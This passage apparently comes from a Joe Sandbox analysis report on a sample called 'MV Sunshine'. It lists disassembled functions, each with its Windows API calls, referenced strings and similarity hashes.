SendMessageW.USER32(00000000,?,?,00000111), ref: 00679548

Strings

ListBox, xrefs: 006794B3
ComboBox, xrefs: 0067947E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 5704227f27144a0956f2d746a092dfc44f53dee14e81ce874c64b2eb72d2db2a
Instruction ID: 80a7e4a4e5fbfdd12a46673b792b4076928cce70dfe73fa57a433b3a572fcb35
Opcode Fuzzy Hash: 5704227f27144a0956f2d746a092dfc44f53dee14e81ce874c64b2eb72d2db2a
Instruction Fuzzy Hash: AB21F170D00204BBDF00ABA4CC85EFEBBB7EF4A300F105129B922972A2DB755919DF60

Function 0067955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

Part of subcall function 0067B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0067B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006795DF
GetDlgCtrlID.USER32 ref: 006795EA
GetParent.USER32 ref: 00679606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00679609
GetDlgCtrlID.USER32(?), ref: 00679612
GetParent.USER32(?), ref: 0067962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00679631

Strings

ListBox, xrefs: 0067959E
ComboBox, xrefs: 00679569

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 8ffbb0ca5bb66422df300eb99a9d5a35a6d30e11f677118f5b46053c84bda403
Instruction ID: 0ec001b2e0fbbe1493884ca4349e792461cf91efd14cc5ef2099a88647cf761d
Opcode Fuzzy Hash: 8ffbb0ca5bb66422df300eb99a9d5a35a6d30e11f677118f5b46053c84bda403
Instruction Fuzzy Hash: 9A21B374900204BBDF01ABB4CC85EFEBBBAEF49300F105159B911972A1DB759919DF70

Function 00679645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00679651
GetClassNameW.USER32(00000000,?,00000100), ref: 00679666
_wcscmp.LIBCMT ref: 00679678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 006796F3

Strings

SHELLDLL_DefView, xrefs: 00679672
smallicons, xrefs: 006796BB
list, xrefs: 006796D5
details, xrefs: 006796A1
largeicons, xrefs: 00679687

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: c5dbd8fecdbc2e2096567145bd9c7dbabcc999ef8ff6f22add374c9450412f0b
Instruction ID: c3858fd16061e3e49467704adccb02fa397233c74827e1b13b26ee1dbbcaef01
Opcode Fuzzy Hash: c5dbd8fecdbc2e2096567145bd9c7dbabcc999ef8ff6f22add374c9450412f0b
Instruction Fuzzy Hash: 3A112976648317BAFB052620EC07DE677DFDB05364F20422BFA04E56D1FEA269114ABC

Function 00684189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 0068419D
__swprintf.LIBCMT ref: 006841AA

Part of subcall function 006438D8: __woutput_l.LIBCMT ref: 00643931

FindResourceW.KERNEL32(?,?,0000000E), ref: 006841D4
LoadResource.KERNEL32(?,00000000), ref: 006841E0
LockResource.KERNEL32(00000000), ref: 006841ED
FindResourceW.KERNEL32(?,?,00000003), ref: 0068420D
LoadResource.KERNEL32(?,00000000), ref: 0068421F
SizeofResource.KERNEL32(?,00000000), ref: 0068422E
LockResource.KERNEL32(?), ref: 0068423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0068429B

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 98579bb70e89a1b17d17a1bedf597b2c7e3cc4ddc41b0cd8a17f4f5efb1bc064
Instruction ID: 91c852b48c5f8c4393cff7034de4b97a3bd0cac2f3443490049c5ee78f35c4f9
Opcode Fuzzy Hash: 98579bb70e89a1b17d17a1bedf597b2c7e3cc4ddc41b0cd8a17f4f5efb1bc064
Instruction Fuzzy Hash: 9031927160921BAFDB11AFA0DC58EBF7BAEEF05301F004625F905D6250EB30DA519BA1

Function 00699428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0069947C
VariantInit.OLEAUT32(?), ref: 0069954D
VariantInit.OLEAUT32(?), ref: 0069964E
VariantClear.OLEAUT32(?), ref: 00699658
VariantClear.OLEAUT32(?), ref: 006996B5

Strings

,,k, xrefs: 006994FA
Incorrect Object type in FOR..IN loop, xrefs: 00699631
Null Object assignment in FOR..IN loop, xrefs: 006994DD, 0069960B, 006996C3

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,k$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-852925445
Opcode ID: d0b9fcdca7a3249ab662e2879a08c9c6c892dfa529393f238df7569e98dc7be1
Instruction ID: 8e23e1ed2da3c1c2d7ee780241ba821b1f5b27891ff87988df73c375c838abb2
Opcode Fuzzy Hash: d0b9fcdca7a3249ab662e2879a08c9c6c892dfa529393f238df7569e98dc7be1
Instruction Fuzzy Hash: 15917B71A00215ABDF24DFA9C844FAEBBBAEF85714F10815EF515AB280D7709945CFB0

Function 0067A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0067AA64), ref: 0067A9A2

Strings

CLASS, xrefs: 0067A721
REGEXPCLASS, xrefs: 0067A767
TEXT, xrefs: 0067A8D9
CLASSNN, xrefs: 0067A744
INSTANCE, xrefs: 0067A8B0
NAME, xrefs: 0067A7D4

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: db7779344547295569532599b5ebbb591926dd687aaa9e0265b24d3cc86a606b
Instruction ID: fb354399eede450cba41dfbc520e3d94e91001f1272a052746de2f8f07088e5a
Opcode Fuzzy Hash: db7779344547295569532599b5ebbb591926dd687aaa9e0265b24d3cc86a606b
Instruction Fuzzy Hash: F2918430A006169ADB58DFA0C481BEDFB77BF44314F10C11DE99EA7251DB30A95ACBA5

Function 00622E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00622EAE

Part of subcall function 00621DB3: GetClientRect.USER32(?,?), ref: 00621DDC
Part of subcall function 00621DB3: GetWindowRect.USER32(?,?), ref: 00621E1D
Part of subcall function 00621DB3: ScreenToClient.USER32(?,?), ref: 00621E45

GetDC.USER32 ref: 0065CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0065CF95
SelectObject.GDI32(00000000,00000000), ref: 0065CFA3
SelectObject.GDI32(00000000,00000000), ref: 0065CFB8
ReleaseDC.USER32(?,00000000), ref: 0065CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0065D04B

Strings

U, xrefs: 0065CF20

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: bb89c8b308aa3dae84a2f6ac6bd49b95867f21db56d319f743b5bde2f9c515a1
Instruction ID: 4d7dfcb68492a96a15dfcf67b1f1d0ca7bd4889c393411019a0b685ab4231bcf
Opcode Fuzzy Hash: bb89c8b308aa3dae84a2f6ac6bd49b95867f21db56d319f743b5bde2f9c515a1
Instruction Fuzzy Hash: DB71D030400205EFCF219F64D890AEA3BB7FF49361F14426AFD955A2A6C7319C46EF61

Function 00698F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,006AF910), ref: 0069903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,006AF910), ref: 00699071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006991EB
SysFreeString.OLEAUT32(?), ref: 00699215

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: fe7a46a8510800fade27a7562fc7be525b932cd35e38870500923183aa92226f
Instruction ID: 0c4eedb5af5f779c846c621beaa573ae3a7c6ea5fceaba858bac0afbe2a44a6e
Opcode Fuzzy Hash: fe7a46a8510800fade27a7562fc7be525b932cd35e38870500923183aa92226f
Instruction Fuzzy Hash: 78F1F971A00119EFDF14DF98C888EEEB7BABF49315F108059F915AB251DB31AE46CB60

Function 0069F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0069F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0069FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0069FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0069FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0069FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0069FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0069FD90
CloseHandle.KERNEL32(?), ref: 0069FDBF
CloseHandle.KERNEL32(?), ref: 0069FE36

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 7fe9ef2a53ccc5f4da3840470d1f856b29cb30adff00f49857fd3d56ebfe024b
Instruction ID: 21ff445af1221dbbb69cae1d9252d024de0036505016ef2fb734982ae16f9328
Opcode Fuzzy Hash: 7fe9ef2a53ccc5f4da3840470d1f856b29cb30adff00f49857fd3d56ebfe024b
Instruction Fuzzy Hash: 58E1C131604301DFCB54EF24C891A6ABBE6AF85314F15896DF8998B3A2CB31EC45CF56

Function 00684F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006848AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006838D3,?), ref: 006848C7

Part of subcall function 006848AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006838D3,?), ref: 006848E0

Part of subcall function 00684CD3: GetFileAttributesW.KERNEL32(?,00683947), ref: 00684CD4

lstrcmpiW.KERNEL32(?,?), ref: 00684FE2
_wcscmp.LIBCMT ref: 00684FFC
MoveFileW.KERNEL32(?,?), ref: 00685017

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: cfca336190f0b303cb5004ee5bc95784e3910056c4e07d247ae28c8a1880b50f
Instruction ID: 2df1b5b50637a9d0042202d8333cb93c7aecdfc1c891ea62d1da39456429ca3e
Opcode Fuzzy Hash: cfca336190f0b303cb5004ee5bc95784e3910056c4e07d247ae28c8a1880b50f
Instruction Fuzzy Hash: FD5177B20087859BC764EB90D8819DFB3DDAF85340F500A2EB285D3151EF74A58C8B6A

Function 006A88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006A896E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: fcd8d24d2055d326613bcb5332c0e897395d26d96edcf40d588eb6e05df19170
Instruction ID: 22bf4ade960ceb50c4ea94859a9a8d15fb7f97891a9283fedefbf3ca09d2e825
Opcode Fuzzy Hash: fcd8d24d2055d326613bcb5332c0e897395d26d96edcf40d588eb6e05df19170
Instruction Fuzzy Hash: 9C518330600218BFDF20BF68DC85BAA7BA7BB06350F504116F615E72A1DF75AD909F51

Function 00622B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0065C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0065C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0065C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0065C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0065C5C0
DestroyIcon.USER32(00000000), ref: 0065C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0065C5EC
DestroyIcon.USER32(?), ref: 0065C5FB

Part of subcall function 006AA71E: DeleteObject.GDI32(00000000), ref: 006AA757

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 152ea1db82684a8844247ca3a7f920727e1430d9caba121424dcbd31bc1b80e9
Instruction ID: cab76635ca5ee4dab313f4af0403add69b17721b1d0863eac284a3fecfbedbd1
Opcode Fuzzy Hash: 152ea1db82684a8844247ca3a7f920727e1430d9caba121424dcbd31bc1b80e9
Instruction Fuzzy Hash: B9517A7460070AAFDB20DF64DC95FAA37B6EB59362F104528F902972A0DB70ED91DF60

Function 00679B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0067AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0067AE77
Part of subcall function 0067AE57: GetCurrentThreadId.KERNEL32 ref: 0067AE7E
Part of subcall function 0067AE57: AttachThreadInput.USER32(00000000,?,00679B65,?,00000001), ref: 0067AE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 00679B70
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00679B8D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00679B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 00679B99
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00679BB7
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00679BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 00679BC3
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00679BDA
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00679BDD

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 0a57d4dde1eea92ab340773487e36353bfe16086ae4c2227529620186b2dcf86
Instruction ID: 87b9ddc09569acc75d311263d5a73ac4fb4807be3d76d07381f233e80eb34163
Opcode Fuzzy Hash: 0a57d4dde1eea92ab340773487e36353bfe16086ae4c2227529620186b2dcf86
Instruction Fuzzy Hash: 6911E171550218BEF7106FA0DC89F6A3B2EEB4DB51F201429F248AB0A0C9F26C51DEA5

Function 00678E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00678A84,00000B00,?,?), ref: 00678E0C
HeapAlloc.KERNEL32(00000000,?,00678A84,00000B00,?,?), ref: 00678E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00678A84,00000B00,?,?), ref: 00678E28
GetCurrentProcess.KERNEL32(?,00000000,?,00678A84,00000B00,?,?), ref: 00678E30
DuplicateHandle.KERNEL32(00000000,?,00678A84,00000B00,?,?), ref: 00678E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00678A84,00000B00,?,?), ref: 00678E43
GetCurrentProcess.KERNEL32(00678A84,00000000,?,00678A84,00000B00,?,?), ref: 00678E4B
DuplicateHandle.KERNEL32(00000000,?,00678A84,00000B00,?,?), ref: 00678E4E
CreateThread.KERNEL32(00000000,00000000,00678E74,00000000,00000000,00000000), ref: 00678E68

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 45ccc1db573119201415f9316fd4562c38a3cc34ba169bd0d1490add78a8a153
Instruction ID: 9f99f46660c671eb4257675cb3bb88e45e32aae5e6579e3b381acd928a90b1c2
Opcode Fuzzy Hash: 45ccc1db573119201415f9316fd4562c38a3cc34ba169bd0d1490add78a8a153
Instruction Fuzzy Hash: 8601A8B5240308FFE760ABA5DC4DF6B3BADEB89711F015421FA05DB1A1DA70AC008F21

Function 00699A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00677652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0067758C,80070057,?,?,?,0067799D), ref: 0067766F
Part of subcall function 00677652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0067758C,80070057,?,?), ref: 0067768A
Part of subcall function 00677652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0067758C,80070057,?,?), ref: 00677698
Part of subcall function 00677652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0067758C,80070057,?), ref: 006776A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00699B1B
_memset.LIBCMT ref: 00699B28
_memset.LIBCMT ref: 00699C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00699C97
CoTaskMemFree.OLE32(?), ref: 00699CA2

Strings

NULL Pointer assignment, xrefs: 00699CF0

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: b8870a5d82b89cd6934aad815ba684b23305aa8eaf5b47d84afce804734c0d36
Instruction ID: aee90de3766d9805305769ba121f9acd199edd1276abe7739fabcfd7d377550a
Opcode Fuzzy Hash: b8870a5d82b89cd6934aad815ba684b23305aa8eaf5b47d84afce804734c0d36
Instruction Fuzzy Hash: 5B913A71D00229EBDF20DFA4DC85EDEBBBAAF08710F20415AF419A7281DB315A45CFA0

Function 006A6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006A7093
SendMessageW.USER32(?,00001036,00000000,?), ref: 006A70A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006A70C1
_wcscat.LIBCMT ref: 006A711C
